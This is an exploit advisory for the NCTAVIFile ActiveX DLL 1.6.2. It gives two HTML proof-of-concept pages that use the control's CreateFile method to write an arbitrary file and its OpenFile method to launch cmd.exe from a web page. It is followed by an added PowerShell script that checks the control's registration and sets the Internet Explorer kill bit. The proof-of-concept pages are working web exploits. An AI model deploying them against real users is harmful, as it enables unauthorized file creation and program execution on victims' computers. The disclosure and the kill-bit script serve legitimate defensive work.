The NCTAVIFile ActiveX DLL version 1.6.2 suffers from an insecure file creation and execution vulnerability.
Anti-Security Research Team & Security Institute
#[+] Bug : NCTAVIFile Activex DLL V 1.6.2 Insecure Method File Creation/File execution exploit
#[+] program Download : http://www.nctsoft.com/
#[+] Author : the_Edit0r
#[+] Contact me : the_3dit0r[at]Yahoo[dot]coM
#[+] Greetz to all my friends
#[+] Tested on: Windows XP Pro SP2 with Internet Explorer 7
#[+] web site: Expl0iters.ir * Anti-security.ir
#[+] Big thnx: Aria-Security Team & H4ckcity Member
# Part Expl0it & Bug Codes ( Poc ) :
------------------------------------
<HTML>
<BODY>
<b> NCTAVIFile Activex DLL V 1.6.2 Insecure Method File Creation </b>
<!-- Instantiates the NCTAVIFile control by its CLSID -->
<object classid='clsid:6B1E11AC-BF5C-4CF5-9DC9-F81F715EB790' id='expl'></object>
<SCRIPT>
/*
targetFile = "C:\WINDOWS\system32\NCTAVIFile.dll"
prototype = "Sub CreateFile ( ByVal fileName As String )"
memberName = "CreateFile"
progid = "NCTAVIFileLib.AVIFileM"
argCount = 1
*/
// Passes a path chosen by the page to the control's CreateFile method
function Boom()
{
    var File = "c:\\system_.ini";
    expl.CreateFile(File);
}
</SCRIPT>
<input language=JavaScript onclick=Boom() type=button value="Click Here For Test Exploit">
</body>
</HTML>
---------------------------------------
<HTML>
<BODY>
<!-- Same control, same CLSID as in the first PoC -->
<object id=expl classid="clsid:{6B1E11AC-BF5C-4CF5-9DC9-F81F715EB790}"></object>
<SCRIPT>
// Passes the path of an existing executable to the control's OpenFile method
function Do_it()
{
    var File = "c:\\windows\\system32\\cmd.exe";
    expl.OpenFile(File);
}
</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="exploit">
</body>
</HTML>
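
Both PoCs depend on Internet Explorer agreeing to instantiate the control with CLSID 6B1E11AC-BF5C-4CF5-9DC9-F81F715EB790 from a web page. The following PowerShell script is an added example, not part of the original advisory or the vendor's software: it reports whether that control is registered and marked safe for scripting, and whether the IE kill bit is set for it. The `-Apply` switch and the variable names are this example's own; the registry locations and the 0x400 flag are the standard Windows kill-bit mechanism.

```powershell
# Added example: audit (and with -Apply, set) the IE kill bit for the control used in the PoC.
param([switch]$Apply)

$Clsid   = '{6B1E11AC-BF5C-4CF5-9DC9-F81F715EB790}'  # CLSID from the PoC's <object> tag
$KillBit = 0x400                                      # kill-bit value in "Compatibility Flags"
$CompatRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)
# Category IDs a control registers to tell IE that a web page may script or initialize it.
# (A control can also assert this at run time via IObjectSafety, which the registry will not show.)
$SafeCats = @{
    '{7DD95801-9882-11CF-9FA9-00AA006C4A29}' = 'safe for scripting'
    '{7DD95802-9882-11CF-9FA9-00AA006C4A29}' = 'safe for initialization'
}

# 1. Is the control registered, and does it claim to be safe for untrusted callers?
foreach ($classes in 'Registry::HKEY_CLASSES_ROOT\CLSID', 'Registry::HKEY_CLASSES_ROOT\Wow6432Node\CLSID') {
    $reg = "$classes\$Clsid"
    if (-not (Test-Path -LiteralPath $reg)) { continue }
    $srv = Get-Item -LiteralPath "$reg\InprocServer32" -ErrorAction SilentlyContinue
    $dll = if ($srv) { $srv.GetValue('') } else { '(no InprocServer32 key)' }
    Write-Output "Registered: $reg -> $dll"
    foreach ($cat in $SafeCats.Keys) {
        if (Test-Path -LiteralPath "$reg\Implemented Categories\$cat") {
            Write-Output "  marked $($SafeCats[$cat])"
        }
    }
}

# 2. Is the kill bit set? IE refuses to load a control whose flags include 0x400.
foreach ($root in $CompatRoots) {
    if (-not (Test-Path -LiteralPath $root)) { continue }   # Wow6432Node is absent on 32-bit Windows
    $key   = "$root\$Clsid"
    $flags = 0
    if (Test-Path -LiteralPath $key) {
        $prop = Get-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
        if ($prop) { $flags = $prop.'Compatibility Flags' }
    }
    if ($flags -band $KillBit) { Write-Output "Kill bit set:     $key"; continue }
    Write-Output "Kill bit NOT set: $key"
    if ($Apply) {   # writing under HKLM requires an elevated session
        if (-not (Test-Path -LiteralPath $key)) { New-Item -Path $key -Force | Out-Null }
        Set-ItemProperty -LiteralPath $key -Name 'Compatibility Flags' -Value ($flags -bor $KillBit) -Type DWord
        Write-Output "Kill bit written: $key"
    }
}
```

Run it without arguments to audit a host; the kill bit only stops Internet Explorer from loading the control and does not remove or patch NCTAVIFile.dll itself.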